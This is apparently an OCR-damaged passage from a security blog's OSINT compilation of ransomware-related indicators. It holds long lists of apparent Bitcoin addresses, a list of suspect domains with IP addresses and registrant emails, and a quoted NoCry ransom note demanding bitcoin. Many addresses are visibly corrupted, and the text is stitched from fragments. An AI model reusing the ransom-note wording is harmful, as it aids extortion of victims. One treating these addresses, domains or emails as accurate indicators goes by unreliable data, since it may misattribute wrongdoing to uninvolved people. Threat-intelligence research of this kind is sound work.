L50ygnnC3guc6iLWfCT 35jEWIBZNTpqGGz 
150zBZQFUvjJNMg68VbP8qCA25bzHuQFcbh 
15p1RYokbUQ42aW7MohaDFZgzMGWDAycKQ 
15P2QAtYhw9DMge2FzasCx1WD893kX4LSb 
15P9DRtxYnPQ1LidbJr9syTRXDhHCNCtCSX 
15Pa4SrFboHktrpcb84WtZuFanhXuUf7fEiq 
L5pCCZgYT4ZYVRr2M1PfLst2ixrz2wQZ52 
15PDDJUgwkUvZi9Ss8xa5rcao7YrcdZiTv 
15pDjwUub4Z4hngZ6HC96McrTJurVvV9D8gG 
15pex6ZRG2UGD8aW4A2wvrcmvPzfWlAijv 
L5pfvGjmwiCQj54xVcshW2f1SZ12KcstuP 
15Pg5eHjdqAH3AKXH9X2xuDc2jjPuttirg 
L5pJEgSRkt4Bh5tiSZHbRVH4JfDSSPOWHC 
1L5PJNHS9QDNEM84dtyPEZzmRtK1Qaqz2iyc 
15pmfXGxMuhMZdF41G4DyKuvyaNVvxNSya 
15poVFm7b5XsiUoAf7BalmdFd239anfedt 
15ppimrvDeyacfiaLSUFwyWxZHFbiyMxK4 
15PPPXMRUE3MvLhBVCcA92ZecRimpg6dEE 
15psdyYhyssnVoPF6LBjPLKpwzVuV7GST4 
15PTEpLhNo4WFyFQDPFmdT4aScEgFactht 
15pTkrzYX8e81Tg7SVix95qBK2uhgFVj1T 
15PuUQpEwm9MV91LRCKdYACE7 pPHr4fFL6cf 
1L5pVtiqNdszrR7bP5XcHJbyqHcxkk2vngb 
15PWgtanwuekcdmwC37MXKXzLrU93TVPZY 
1L5pWMYtJyaZwowhpsjK7kPmsi6eny984Mc 
15Px8K1bDDapUrAn92vv6yQVWWRflceDgZ 
15pXaQAf3Z9aGUgQjTKLx2A0EGVWoAS3DX 
15PYT3NoaDpUpUKwzcTqn3XhYZHzxYZajQ 
15PZxZMvravofs2sD5ZnRwQCZQhnTLVh2V 
15Q1Mosi2XPeqMy2Ddi4k2SACQaTjMVxT4 
15Q2694pBcqcj19F5CBmiMB58L73meFWxV 
15q2FAm9fboZRMJwimD54vLGLqDbiCo9es 
15q4tBL72b8U6vol1lT2fFLZW3xKe2NT5bG4 
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15Q5DrfJuFFwwwzMT1YDdFyS9wTZEZY1DA 
15q67gUM1jm8mX1TJzf]JQasyz5aKN4tq7Q 
15q73izmyuEtZ1Mi4qgKBAfGFkJCM5Azvw 
15qavY6DCmMGwkWol1gPzt7KvL3MFHmMkvSo 
15QeUAjqciuJwuB3Pwdk1Cpsi21b4CeLz8 
15QfGabWbDNsRUVbp7amw5xe3AgsUATRwk 
15Qhc2y2EnkGAbFeDVS93f7ECbJBymFwa5 
15QjlieHKP95eAqnjT8oEnuTmfnMJVxnRB 
15qjf2ThHU4eHkyfNxrMVEZKsswPelFyaqL 
15qjoGrZwjSZGLdHSiH6mpe33swczfuY82 
15qJwZdGzxVVNuQJaqyyiY 7bJ9FGdvmjQWH 
15qkAyG2jgoCovp7FYrbb6N8SVSrG1inFbL 
15qKRrvfDhwDD5cYX3LLWZFRW98NKACFu7 
15QL81s1JA3nXRPjP4vyGnCNjPAJDFAe8L 
15qoguLXoHG4rgNyCUhSm9TuZiZ2a7mMGGH 
1L5qpEYJVfvxpEHPq6LaG9OTb6RFw9FkdGBm 
15qpgCLMJvZ8YhKBketDkR8hicfox8xsvY 
L5QQHASt3rK3CgpZs5T2x4n3tpffNBkcww 
15QThPdHns569YB8zktusphq36M8ptHFcC 
15QUGrDsjJ9iIkKLTETLQODNR1IwWXg5UVKUG7G 
15QUoufwdXb99mWNvttWadfRApSZGrc1yYz 
15qUShWbuTXpHnCoa7B9ue85WWiAqcWHZs 
15Qvc9TZJHESN3MYyz13G8Z9AXHun 1ijDi 
15qVTezGX80e59u8qfnv3iqB55nshiVVTB 
15QX3TkvkPbMPFw91dFkKAAQqPMXh8mqK5 
15qytgKBQKRGCUZX2XeTii7vgdE8JzZJYQS 
15r16udrL6Csx1RXFNg2HBZzr9LUPYNHQp 
15R1xwUNm]xsJEnCNdgbvSNupehtyuHinF 
15R2bzMBBroilsnbhRUPUXxzFZKpnjzRyrU 
15r86ugqCXeCfknaSRCH865UHyPfruMZLz 
15rB46fSedpHPc8yzMBrAJv651UhK5ySr4 
15rCcMNxu9miVbuUWEGfB3Kb3ErkJjJXLYX 
15rdUyBads2QN7gEzgZmzVnG6t7rWppYsP 
15REoFxXoFVTkK6XRDeLBxVkasSnpFrnk2EM 
15REYH23ygLJb5a2pYvU9ME2CpzRsKHHgL 
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15rh7JLGWQ5viPqvezbVDYiK9grSROPBBL 
L5rkjyqBOoKWTjbQSb12jCxAyBEYHm515GK 
15RkZRe6yCFoNJq4NetuWoAmdyEVSMEodF 
15RNmT6by813UXptNLMhJTNtnMFcEhwqNnM 
15rNyo3b8DUXeQHYCeRE6GsJ5fQcRGGi51 
15rpATUtK3huuXarxXtuDABUgeTf3Ex7ota 
15rqnqms9RD3cHVtRug5uxPjoNv6JykoFd 
15RRD1qucjdonhAbL5eNKEmgKds3ZsyHVU 
L5RRshQiACpREpMmH3RqRYQ9YIPKjwqo3c1P 
15rrUG2CZ5 1JhupZ4EAtkK6atuSU2SFQWeb 
15rrZSz59Pn6FP7jgo4XPMfMo9QgPazWMD 
15rUpherZxsuMchjuZnnenkJUMxVdhwUMo 
15RV4a9GuBkNy12S3iHqcqzyxinc9SEBqd 
15rwLLfWXxeii48ENGXCpj95Ny3cEC7n9b 
15rXPRCVTh5HpBHYZ59cwMoELoyhcEG1FG 
15rXs5WzskKPmhtGVbPbQPEZuLWJkwMKqvB 
L5RYbY2GUIQY66APVDVvgmCQ4EkxXvZXatq 
15RZ677U63u5ugGWtEcpBbmgqnvQpc8niNA 
15RZG2NZq6eGr7cFboxXTiuJgsaeQBmViea 
15sl1dzVc6vPNqYzhgT3keR2BvT665u6WBe 
15s2dQufp2tzUR1jm8xmxHDE19twE4NJna 
15S6FKANPMC73aV7BTPffk19ijwxuntdTT 
15S792tWVsL3kZRWkC8306T6alqKqndUfr 
1L5s8fQJikKISN1XnjDWnyoEykk9Nq4HoRSD 
15scDBywLbyEzzg4SLZPpSvpy2FW9WuLCs 
15sDe6rBT IsJq7gRzpD19g 7HgdBTeAECqk 
15sdsApLs62uufCtX9cNcH7Cib8VBg8JfL 
15Sg8SyKMGNggTFIwdhR8g5UxytbjJD9j9N 
15sGuAyYVnkoK3MqmvA5h7iyjgHgNNNMhF 
15SH1SBybDq7WdAgB34riebLaH1kQgC7yM 
15sj2EdhPVDtd3jEjn2uXgst6WcxbUrocg 
15sJC6DBKbshtMoCEQRYmRm1s]u9kKUwWwQC 
15sjCjaCcfiqJjnnxr3GM3R1IM9BPa5STVQ7 
L5sjtHNS88WSTyQEmqvGJMjRNZf1Yryghf 
15sLzRU6sbdjpGUWAShfTkKbBhZ5tSNcBNB 
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15SMH5YbWuixjghZ5AubhWDKRFNfLLkS9Z 
15Sog1FxFbXrCifjvGYdUKWYXCBn7vPpZ7 
15sRi2aLdDQshecU3yeDEgxRqVhZL7NpRf 
15srN4ZMZYuE4XY OrtTejfsFdVBZ9PKsw9 
15SsqdrWXBGj2ScJrovfgQu3uY1CDG6EUZ 
15sTvmhRJei5pKMgDtjXDqFXTRhiidQk4a 
15SUa6bBZJMZBDFURfrguUPVpvxGACuU2Rr 
15supo6RMZt95NGoeQRG3DcRj652mjreYr 
15SvhXznE5a8cBXAPV6RWMUKsWhk9Lg2tA 
1L5SwfYXPMghj9Wb9BjgAv1fJSRcEr3Zfyl 
15swJsCCG9zGZJFrpPQ4qVWSEZPZAV9ERL 
L5SWLthjidMrfnLHFmxw4hkbhz5bnULP9Z 
15sxQ96qvkQLsB2BU8WmBXznn9wokyYfig5 
15sYdYv2VnM7wHnvRaigvlsFZQKKnMqKBF 
15sypfr]puG4yexHdJZq68Amb6c9hVOhHSFD 
15sZNxhyERVVKZ7aC7u8Eo5yLT MpPoHdSi 
15tl1HUpX2UFodVqheUPpq4L7RSwVme6rxyy 
15t2dR6bNp7rcpWQgY2TMv9mUmbXy3n2hw 
15T2RR45uPFw24yDK9QYG4crYoPKzM3LEo 
15T3DtDFV9yXfMnerQtWsws9JmKWnANosK 
15T3MBkEoZaWdoGtRINY15V3hxYq6bWq3N 
15t8bu93cEr37uu4uabX7RxuGUriSpKalr 
15TaTGTdsRLPnTDO9HMWDuB8tgF26600qged 
15TcDKertLE9HdUhaxcPQhiJfVCJSk7A3X 
15tcNsUfTHWLa6p2pD5YS9M85ebt3dFGW6 
15Tgs2Ju6z8WVnugANJ4w6D8Z]J1jSLQo0Sz 
15tGttpU9YnmKFqwU3r4FfyN65CuqZtsfi 
15TiIGD64pimR1IgkhE8ZjxXn4tu5kYEpcRjn 
15TJVDeC7HEXH6BTp8yrcFjvepw5PtR4Zy 
1L5Tp6LtXcNEec84zdUrj4pc8YisnSNzrag 
15TQZgRKyJWGTspKXege7TJvs5dheKiwg6 
15tScMvSNMBERof2JxsjyKjBjRTatFS9TK 
15TSLng8wP3YBiFKJ4ymUyGJ212zjUosvw 
15TUDg26zRv2JhXiecQwxmetHm35Rx8BW9 
15TvdFApqfQYZUqK7EzZRfTbFavWjaaxXrw 
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15tvQWvSboY13sPUcC5EB73LJseqS1JBfb 
1L5tvxCYQCtggKv2zeFCzZDmgSTx17pxeYvc 
15TwdePn3yutuewT 3PP4kBzJEqfMyGp1S] 
L5TWEnKRe9xWD2WSVN4ziSiIGKpaelpWcac 
15TxuaW93U6jr59RUNPLTfydrxXVZfc9U3D 
L5tySxhtpvcfVYVsQkuaAXYwrLQSjggAUa 
15uaPcx7G1PNHs9xj4KfitNt3 DqBvjmFuG 
15uAQDR4DCwxUEELUyqoM6krKEABJekG9y 
15uAw4CsTj6NLyqfx5a4JaKH35CADILSgF 
15udbEkeyiF3bhoPVRJM9BDSdDAm9A8yfk 
15UdGYkWnhosE3x122H7bwS86Egk9PqakD 
15UEHrT2DdwauhH9QUUPEVD9av2b]7xCvBW 
15UF7Sx3RvkgBAqD8QvpdAHhguGfj4xVWk 
15uFoCHzPfmGT4ocwFScLSgHayraEL9Pwu 
15UheiezZGRMGh2Ds]v1JSKXYSugJcb2NnP 
15uj8QXrKMb3RdZNTSQYYte3co9qH2gM3S 
L5UNTXXQRraNJK6PjBTjDvFIHNNnoqCUTd 
15uQtTIMHmkLPz526q5rlgzwMdxtYaPZY5 
15UsSE91wjJrG5uJ2BdRgYs4iEThipjfhCy 
15UsqZJLX6GGMxdCAPMzhRjugQa4vm1ZuA 
L5UTMYjcQDLpELJNNCoM4GP5RmMHGM66DyW 
15uULDjxq7VfbjoNanBMHh8AJ6GMEMug2V 
15UUMV6dK2X7rVdizZHtGjisgEx8jwxSgL 
15uXVgTQUy9iIZWEoV1sWG3JDZQexuPURON 
1L5UYJJF6MRB5yPtqhkdyTi9v4Hb6EDXU1Dc 
15uZBFJH8yF3zJV2rAgcJGVGekKrT6mMHw9 
15v3RjjGocDWJ698bCFAKjYeQ9vHaC3SGy 
15V4viPBqkhodNBwiclvFeSYumuhEJmMYWE 
15v6z7jAWLYB4r8dVZdu7TSsYREt3uqt6w 
15V8CuUGQjGgLvgfjLeep4WDNoREMJhr3} 
L5v8yfmWvY46aDSvUPuCrgFzqSFh507B6F 
15V94AVQj7DeYMRgsGEKBCxLwTYf4tpc9o0 
15VA6C3wWQHhgpmX6YDYsyEFT qt IroXMixjR 
L5VBHToTqAs3QXKMRQExZhCfpJ3WpWcfWy 
15Vc8JwB6W3HJpyFA2SLWNhjDWcEne6ékdv 
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15VEA7EbXy2u4mdTHvF4cV5dqFoYmAfKUL 
15veSD8z54nXPRKRoXGVMpffKuziraFegZ 
15VFeb4mmoPs6LLdam16CspfJbr2EZXft1 
15vh73heF9dbawgfz]SJ2L8dVejXK6mxXk} 
15vLhxxTQjf6ErLkZGzZ6UViehK5Rxc84J8m 
15vmigAF7vZ3hGYk9Y7mdshJ6cR4gu3uX9 
15VN2U4Fmo364STKGe545RJWj8ZyzaozUg 
15VNxb74yaWdAai8ixJXFczhxJD3v2AZ92 
15vo4hVLhAasR2LxmTQcZL4o0jNUULbBLLIi 
1L5vPNttzvNoeaVmDjaMojveJH5iVfkaifR 
15Vr1ZZ4wHZQeU44FsBZTbx3wmnNXA3muH 
15wAReEG4TDb8b3fcMSXXXKC5HniRaQo7m 
15waYdA6GExQhqUS3HyX963fiXcQ4ixXKalJj 
15wbqMbsgBWdbyt3KeAENjqACgDftCU4EN 
L5wbsMbVnjTtX2ScCN4ekkNZ5ZEzYAZDvg 
15WDfXrXLiBL7 KE8uDRFdEkFsmirqrRaAL 
15WDgaFHwDaBFuT1tPMaEz1Ac7pyuC7UGN 
15weuoWVRquKyb33ej3pfnDZYeCiCXwLVp 
15wfoyobZKvGH5T9YSUeuSvg9MbMgzWCyY4 
15WgjC1My84DLWYGpsw3249arrxYAnw9Cr 
1L5wi9gvHDSAJuPuowiwg8hjXsT8ttF791Z 
15wjjQ1Vkdgk5F8U8CVKDKngagxbhvrzpL 
15WLSXfV5YrJWoaAcruPTtxJ9UE4KUKg8U 
L5WLY8frkx14RJEu7kKCO2MEWLVYzaiVwhr 
15WMwrJHELDKPUZbZsSZMnMPqTN7fxWjub 
15wnfSSPwrupsYM6z74b9DxP6Y1uUF567RE 
15wnLBXpC1zRgXAjL324xhGvVDhWa8yTKV 
15WnNBfmsSgqzZyL5Hh5zgiJCvj TubrHf8 
15WofwrSiXYdNzGfFnXVnBcWr840Z6snZM 
15Wot2vxC3H74N39Xr7g9nDk1PVFmj8MYU 
15wQ5CMoi51CZbELOGY067t7boy2Tx69YZ 
LI5WTTItMkFMsjTpizoVMiEvFdHdU4tKVK6e 
15wU9NMUERsz6ucDDR5EFnpRAf8KTASpDu 
15wuPzujjezc84S56sHR5iruYTAv7TRIMn 
15WuTjoY3zhu2BqxXnKQ3CBq7RSYTGZPH1u 
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15wwzG9t7LT9D822bcBfK4xHdgXbVBLXdW 
15WyMdr8t6Jza8XxWsUkJcKtNbLE4mwHig 
L5wYx3Z7Smyi2f8toib1lxCfchbUucQrjnf 
15WzwebF5jN4Mhnq5e57TB6UueTZwiLSiY 
15x53SVQTLrCpCLDMHGf7j9a9Ubzr]73FA 
15x7j7vg57yYJ8bXkKMhZs1WPNithnaZih) 
15X9eQEQspiUZ5fuYTC9WNCE7khW4WeZTi 
15XCjxdWgrJyeV3jUComivjKGldynqgf4JT 
15xcx2sNNAwXyQrqvJuUiktCnURf2dUAe1 
15xdPitVQF 7w3YYHAtz7F5nZrT3trxVgub 
15xE77usdqgjRdqEfgKYLezcvkxgnKqxqU 
15xGckUcwWJ89BoWLkTWcZjBJixdzMSh5u 
15xgRsqNCcH5jp5vLZHjvGE5HCWuxnEfEG 
15xgTpwy8yN9LhsYvjrHa41YEygF8kA7jz 
15XgU1qRWU12gxZ7GcqdH3tkxYmt7eC9sr 
15Xgu4gJvZe4zDiQS7CQ2aYodlyqd7aLoA 
15xivRS2CKLL35SCYxDUAaiFWheffjqyY pf 
15xkooDfGf4W6iXctAo2wBortjJRtkk5x5 
15XKQBjbh3WzQ5nYZxKSGuUuFUVhUJjLNW3 
15XMbR1Ay2Ad3YvY29rRhtzCm55cG31Mbg 
15XmLcFavaMEjbAtBVSmCQhZqcAJDxDZPS 
15xnvF 3SGwjB686CBurV22HQwaCsgB942U 
15xQCnuGEQzVaU8LBVqKCQ8XSapGVEi8PE 
15xsRHufgW3G4y1xtC7cnHgXRo1Nvz6AbR 
15XtDL5XQBgCCG4os8PaFpupEZjuoZ9TxB 
15xtWGKuj6GLWXgYyJUxPH4i6S8R3R9nPy 
15xv3EgfCfUWcwQtPg 740lodkKXpkNjLXB 
15XVKc4MPNxeHmdfWjxX5nVFdT2X9hhuxfL 
L5xVYJw1lSqc5vNj4yTrj TRWfxivwNCDrw2 
15Xx4vFuxQLqE5KKXyHANey5YcRbo6sxXGi 
15xxjNFYSbDEB7uugAJCn1YKeNony6gGqx 
15XyD4HUBpG41fubB5tLSx4sL9XViIDOUUJ 
15xzzh4EVt2fAV8DqZuFkg4nyLWx]JyFz6C 
15y1RQ8fGN3PpjxvGVfKDIpPNfhCtvHEK8B 
15y3wbP6a9Hoq6wCHxouo6QTJKMCZwdcy7 
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15Y4ApByZqi449wvjf4S1n4wDF918LdbmZ 
15y8CBMKqujKmMMKDJZSXp7rQzaN6Mtq3hb 
15Y8ZoeoDX7J5uCM18eP4YfaLYrxXpy6uqD 
15YABdPTzn54dJhsiDJeV33GZ9yKD9L1Lj 
15ycsvjt3MGHVu9naDd4zcAsUSyetagMuH 
15ydZRGbv4nuadbdxQYU9FUz7sp8unkE4J 
15yfe8o0F9qr3v6aUZiny3nnVd7sh42Ya9Xx 
15ygQn9DzeMG4snkuiLNen2HGpv2RbZ8pg 
15Ygy77Bv6SaMKD2pvAUpbN1RMqXyy9GEq 
15yH7KkS30V3JcHCWkkJaQxxsjV6KsSkKDgA 
15YK3dfdwJcj9xbokWts48YSeLXyFgcHKT 
15ykujuRCmMW3LaxydakzBb3nfU2K95eTVs 
15YndULbc8Wb4mMrGpinizDKXvjmajznES 
15YNK8ZhbZ6CeF8DWX3b2t3pyg2c8ea6UW 
15yNpy9DbLnfw2iz62jNEZV4EaMPCf4WXo 
15yoHVnevrzR2S4cGKpeJfSwZxn3fcRDB2 
15ypJ3NZB38SWsvA2AKGd8vCTp5kjodR6a 
15YqfCGsi8Ug69Pq2y4BJLRyD81ag76kFG 
15yQxLxxWTzzUkmrA2LNWWuQfzTxLnAQj8 
15yT2a8i2QccbW6QgFFKtjUqCJC7Vjrtbu 
15ytk4cqishffkW8ggf8paQ12qsbYkpnQH 
15yVXypZ5MCjwShakWyfZZ9ZpSVmt6jnoC 
15yW5Q555gJxKGLZadnzcVrY Xo5NiiuyvC 
L5yW9EhfnhB4vznCfYLcFBS4C9tkiSWjLY 
15yxjyJjdwZzXLN8vXRb5VMVvjivKaVXcSmA 
15YYrCazK3zQBwbdhAzkuWich37o0Z1qrpx 
15yZ2UpwQDX5ZrQeUDX3FKP2ZNpFHT1Nnu 
15YZWPAkKYHqUGE9pFDR31LHzoh6es6wJRH 
15z2BbcHJHNuPCr98LDS6soaLueT6PGLVt 
15Z3ZBCi2RxP3xNCbfzcCZupRWCTdyJtDN 
15Z9HGSDY2RLuPtt4FRmtkyv9VGfnhmj8p 
15ZBq8sQiba43XUfSXCCCim9dkCiIARZ9qQS 
15ZctsKiPe8nLFFNWGicefgF545cQxE7CF 
15ZdESZ4UgB67aQojwUNh3RkpkygtuiY54 
15zecSCwGDARzub5yrou9eEVBfCPrW8duh 
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15zfTB1TNZvBF8Db55FvdH9FtDUaGRL7Wj 
15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 
15zZh5MfLcoEYRrU1u7nTixfih7 LTVBQ2Yw 
15zkvooGN5jSeL6TzXxrNm3151QcQmjTpg 
15ZmDRBHTQzrp5yqwnjJuUSGjwkgJLG7Tn4 
15ZNRXsiIQ8GXP635dkxgvxenCZJtBrFGE7 
15ZnVUHi6btV8DMg5j65WnstKM3DFdla7A 
15ZQDGKkALnkFykbnt8HAnpBYLciEenHH2g 
15ZsKGVexXxoj4DF8JTWo72wqgRgZz8BRbP 
15zsna4MjeAgRDhXT9uAqHesnWQdjeuzi8 
15zu7ALdCKCu1lHMpobsvQ34NepdLdcAzWe 
15zUus8NNWYZ9uUQyV3DDuFQqWRE9LXQhyco 
15zVrkLTdbeXmyN9C5 Top324hBmb30nwQL 
15Zvzq7uiy5xP8DDX4sDvLnH5ZRP1i99rG 
15ZY4xtflPWkdrrenhXyjgRZBosmyk2E6p 
15ZYDy9keNyQKzkBX5h8PgAetLubfP2qvY 
15ZZ6FSKAVXVQAnEKNfbZPP8EvqcMpScAK 
1618z8B)JkLgXHPkPaLRWyxp5PZ9EfMRty8 
161Bb99AcNgTfAqXxoCiZVNpycGue3WmAM7 
161C9FrEJKKtfhDiPenDiBASK32FkjUC4H 
161GKnGt74Do1pHZqtKTZJ3z7Y9qEgYWwF 
161L5w4RrVzDquBmyFMKPur4TYC25DTbMm 
161qr4JbLWP8CqFZzJu9jTabo3GbY8v6yt 
161QwcomQ2v4HmgoqdSgyBYkxnRDUZ5K3X 
161rTlwbvC4wu3c7n5z7YZZkaW3cfKRg92m 
161SSoJcn8Net4XLTmwC2wgNF69m6KMRmN 
16231qzZLBEtQ8vEfspvAjUanAx114r1H9 
1625fWb9YGHbE81kGdkonygkoXPvyUbTDD 
162aS7fzwNq9zDqCzCoEYArwfS8HgrYWWU 
162F7hdrgSB2ZB8tMGEHFjsR7bc2PKcx4] 
162HgXVQorizW7GkRARUHV6y2exgZMazjT 
162KH53aDP6tJnbm2NwFiylLLd8k4QEM8y7 
162kmtsQNE1SFdB8HB11hwxQMbq8BhMD2q 
162wVW2tuh64dvHfZmkKrzCrR27GDaD6zRY 
163A2U2sVC2QjTdGJiTWegXzTRVTut5Jg6 
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messengerinfo .cn - Email: allisonnh@soeconline.org 

greattime2009 .cn - Email: webmaster@seniorstuds.com.ar 

iwanttowin .cn - Email: webmaster@seniorstuds.com.ar 

hardnut .cn - Email: tan.mei.sie@monash.com.my 

sitemechanics .cn - info@powertrackers.com 

exceldocumentsinfo .cn - Email: info@powertrackers.com 

chinafavorites .cn - Email: cmo@ci.springfields.or.us 

best-live-lottery .cn - Email: info@powertrackers.com 

adeptofmastery .cn - Email: info@powertrackers.com 

trytowintoday .cn - Email: info@powertrackers.com 

bulkdvdreader .cn - 94.102.48.29 - Email: info@powertrackers.com 
style-everywhere .com - 88.198.105.145 - Email: angy.helm21@yahoo.com 
clicksick .cn - 67.215.245.187 - Email: webmaster@clicksick.cn 
supportyourcountry .cn - Email: cmo@ci.springfields.or.us 

wheels-on-fire .cn - 94.102.48.29 - Email: epron.sales@epron.com.hk 
stillphotoshots .cn - 94.102.48.29 - Email: epron.sales@epron.com.hk 
delayyouranswer .cn - Email: info@globaltechs.com.cn 

getbestsales .cn - Email: info@globaltechs.com.cn 

library-presents .cn - Email: hanzellandgretell@googlemail.com 

in-t-h-e .cn - 72.21.41.198 (Layered Technologies, Inc.) - Email: admin@in-t-h-e.cn 
bestwishestoyou .cn - 94.102.48.29 - Email: hanzellandgretell@googlemail.com 
library-presents .cn - 94.102.48.29 - Email: hanzellandgretell@googlemail.com 
getbestsales .cn - 94.102.48.29 - Email: info@globaltechs.com.cn 
aware-of-future .cn - Email: info@globaltechs.com.cn 

nothing-to-wear .cn - Email: steg.greg1992@yahoo.com 

newsmediaone .com - 72.21.41.198 - Email: advertizers@newsmediaone.com 
bapoka .net - 87.118.96.6 

stylestats1 .net - 94.102.63.16 - Email: grem@yahoo.com 

luckystats .org - Email: director@climbing-games.com 

luckystats1 .com - Email: grem@yahoo.com 

lifewepromote .cn - Email: ruixiang.guo@yahoo.com 
securecommercialnews .cn - Email: contacts@swedbank.com.cn 
snowboard2009 .cn - Email: weinwein2@yahoo.com 

nothern-ireland .cn - Email: accabj@cn.accaglobal.com 

goldensunshine .cn - Email: info@tartirtar.com 

steplessculture .cn - Email: info@myfibernetworks.cn 

vipsoccermanager .cn - Email: opressor1992@yahoo.com 

b2b-forums .cn - Email: weinwein2@yahoo.com 

rondo-trips .cn - Email: acurtis@stevens.com 

mywatermakrs .cn - Email: shanghaihuny@yahoo.com 

gazsnippets .cn - Email: acurtis@stevens.com 

bestvanillaresorts .cn - Email: opressor1992@yahoo.com 

personalrespect .cn - Email: weinwein2@yahoo.com 

consensualart .cn - Email: shanghaihuny@yahoo.com 

yourholidaytoday .cn - Email: opressor1992@yahoo.com 

guidetogalaxy .cn - Email: stp9014@yahoo.com 
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163aqEXMd5yAZgDqWifF8tXq7yyxXzCAGpz 
163BAKLgMhgQZJ4HJ2KecSAlyUrZiE8izy 
163BMbtMUcfZqqB2Xvc4YPrNjrymruQ5Ks 
163DVWPU9xpepn5Q9jA9swdMcRBj5nkC8h 
163Fp8ka3feBil2rGgicYz9PkKUsdKEFwzn 
163gSkfxzRWUghQsl1ppS9ftdgry558WY6S 
163gXKqUKQQgj5iuPVpJDvmLSWQs4eQnvv 
163JET7dSwrxfUmFrme93HrUigYupzKvaj 
163jvfwUQL1UEejpprx6JNtn3TXRddVSTE 
163JWcns9844dbChxqsoPL6twxtQ2NTNbt 
163neyVd9FGyYRNTF8FMYbixCDfAZJsu31 
163QGtfV5BcnNN5dHEpVbZFEfh|5zkKUvQm 
163r6Ep83qnrp1TDxHjhMBc5RpfC7gQ9JP 
163SqrMg6W8wfDj2RKswkz1rjcmYEME7XF 
163YcLqKsQTsvwpsZcuM8]vXhRhpqQv65X 
163yLmpDnXRJsFpldeMeqCsqC8xCUr9kye 


1641nWK80H3z48ySWCDZmDUhRewo3awHrV 
164BFAnwNbmRxUuWTX8Aau3zSqwcw1Qjzw 


164bQn67gwhE5SCXem3ZA75KNaTIt6CXWLG 
164CukEeD1GF9bsrGW2rHv44xuwUHgqampE 
164F2hXnEViIWbmDFsSykpB9ZGTj|DK3ZUGY 
164iHguuyXnvdK3dwBM]Jj1WcpbAt8fAouU 
1L64kvFNWqV22cVrEYKhmMAdH8fV8SiDXDj 
164mgmuum3E3nhkdxAL3DbG1b9fw2wHLt5 
1640Y2ygibt9wC}j352aQtex18nmNHnPvk 
164qBkckbdRCmRauz58rm3jcmktQ3Sf6U4 
164S6c73rDosMXns1CnzEZi8rGPrQhCuAz 
164T2ypCpphPFbodExjcj6eHpRZBEB3JTe 
164v4jgoQgjYAhenXVFeiVY1gU4UXvHcPV 
164ve4To5pWxH162UZxHKDCKsn6yGtxqdx 
164woCs1fYKwyUTroKwSFYgAiGeZzjUSiK 
164zf1CiIB5HWmxosQCvLZsDC4kSoWpBp2i 
1653meWLzZncoPFqlLVpn3XyoiW4izgPtoC 
1657xrgD7VvWAS5ShUfdwckKjJtsABBWzjrY5s 
1659i4SE9yGZaqonL9QF74dg378qBsse8q 
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165aLodTKjZMJJSQiSdUijLEhnwhydhe4L 
165aYAoQ9irEozebYWXZM22Hgb5kgRb6CPx 
165cHSsb]vXzFsaxwu6v7QWGRYyUfhFiJb 
165eYxQM3CkycvGJV77hTSS5TE7rQw4kKrv 
165jjwWUQbu9MSFCXnWqGjLRFToefVURWay 
165P6Vxm8tqEZuESE8Ytg9Nkgv6Zel GDvr 
165p7NWuc2cQYLWVuMyHjoSkxQJekuAz72 
165rg8V4DVkemR74kJZpTBNUWvyYg66CG4 
165RPpu2yMiFkpvqRLHJnorUuFDtsSRBTN 
165SpsdPdGDGNAqooJQFBmMHWWcVa6DZtVk 
165 TaiqVoAxQ5Nv1QaXFP7zsbWARNAIGBA 
165up5ueVLuFb3qu4VZLreuCYn7C824F7X 
165vBtSRVrUXKXJqlaYM9raGxuavmaGq2r 
165vtA9Zdd2e3wxxXJCZXQGqnMSwHr3jU2t 
165vz4wmgGfbCK3hJJxwzjzRcKHHhCfFNK 
165y4vHXnoid2mxpnWD6PDcfZr8uSBrw2X 
166EhtUfdrnW3EdidSTh8tWDCVzZYpmNWkn 
166ghxu93yp2Kfz819nNk17q6qA34wYffMq 
166gvwR5t87SAXHpbTX085T9Vbz7kKKcCKQx 
166kx92AESr6WZaMD9vZCUGYiH4aJcmVyA 
1L66MAD5o0thQzuegzyNoJMYwTX9gDH56zT9 
166qtF6BzzvN6izVvyTtyKNbHEUA4Ejpu5 
166RPBaU8qfUHpZG5hBunSLwXbTBNBVyD5 
166sLK5WxHqoeiEtT4E8vUfsdhUPLZCfpf 
166snzhezkmERYDJ20GkURnzSvpX27CBQ6 
166vj61jM1lyWoYtu3Nd3Tmo3YqyHrgAHd2 
166y3WDMrgmGX2AVBva2yLeKaYomnxFw1) 
166yMjKQsEFngzBr4Ds459dmtWY4hGepQ5 
166ZGLy2f3FSuJTPkoL7zfWyraT6he62qK 
1674MymceQRvjUP5FIAK8CvayRFlyaGwVL 
1678cxMKp9Usgbj6HjbSEFTnMKvghwZeos 
1679AM1JaQdBLtBDEfyUQSHArcLDhNmonf 
167HDDg9BqknQ6NyY6RfLNNPhYMUjGTUou 
167hZCt1KVhdQ5UhYZWxhX5NiJ3XeBkkF;j 
167NbvrmyyNGPHhVUUcjwFDofh7TzLd3DK 
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167PyhwvZxXcMLnKEGKv1YHLaeV5QBx5cC 
1683GYFDMZpPj7645yLr9jd9jiHCMWABWn 
1688jfsdRPCjo8t2qgtydVYMLu339auBsP 
168bWbZF6VcQnVm1wBoekKWkKPyhy771W6dx 
168CsDqVJHFKNgVH3WXJRkzphuRVwZkQjR 
168im7ZX46pHLIcxZ2NdiV1X8mfJ43Crit 
168)fkwJ2GXuwrzLfiq39S1XcX8smM61HW 
168JUQhgnAuLABSAPNAX]DCffAC4VhWATy 
168KQtJ1X3EezsYbXG1lg7qtELJuzaXPKqT 
168Lg43hWjwXeCRT qdJFfdj 7rH9esmEVLw 
Stay tuned! 


1. https: //blogger. googleusercontent .com/img/b/R29vZ2x1/AVvXsEgQQhopLrrCL6FDE3XKpY1Z_2pDQy7dAkhOZAe2GjK-- gRuN 
MgWCHNmcXWXs3YIukrf7xiEf ICgo8NeNhbC1wj4c80xeIRH/7NpDFsd 


18.10.7 Exposing a Compilation of 20,000 Ransomware Themed BitCoin Transaction 
IDs and BitCoin Addresses - An OSINT Analysis - Part Two (2022-10-25 16:35) 


[1] 


NoCry Decryptor 


Ooooops All Your Files Are Encrypted ,NoCry 


Can I Recover My Files ? 


Yes, You Can Recover All Your Files Easily And Quickly 


But How ? 
Send The Required Amount And 


I Will Send The Key To You For Decryption 
Your files will be lost on : 


See You Soon (0_0) 


About bitcoin Send $100 worth of bitcoin to this address: 
e & 
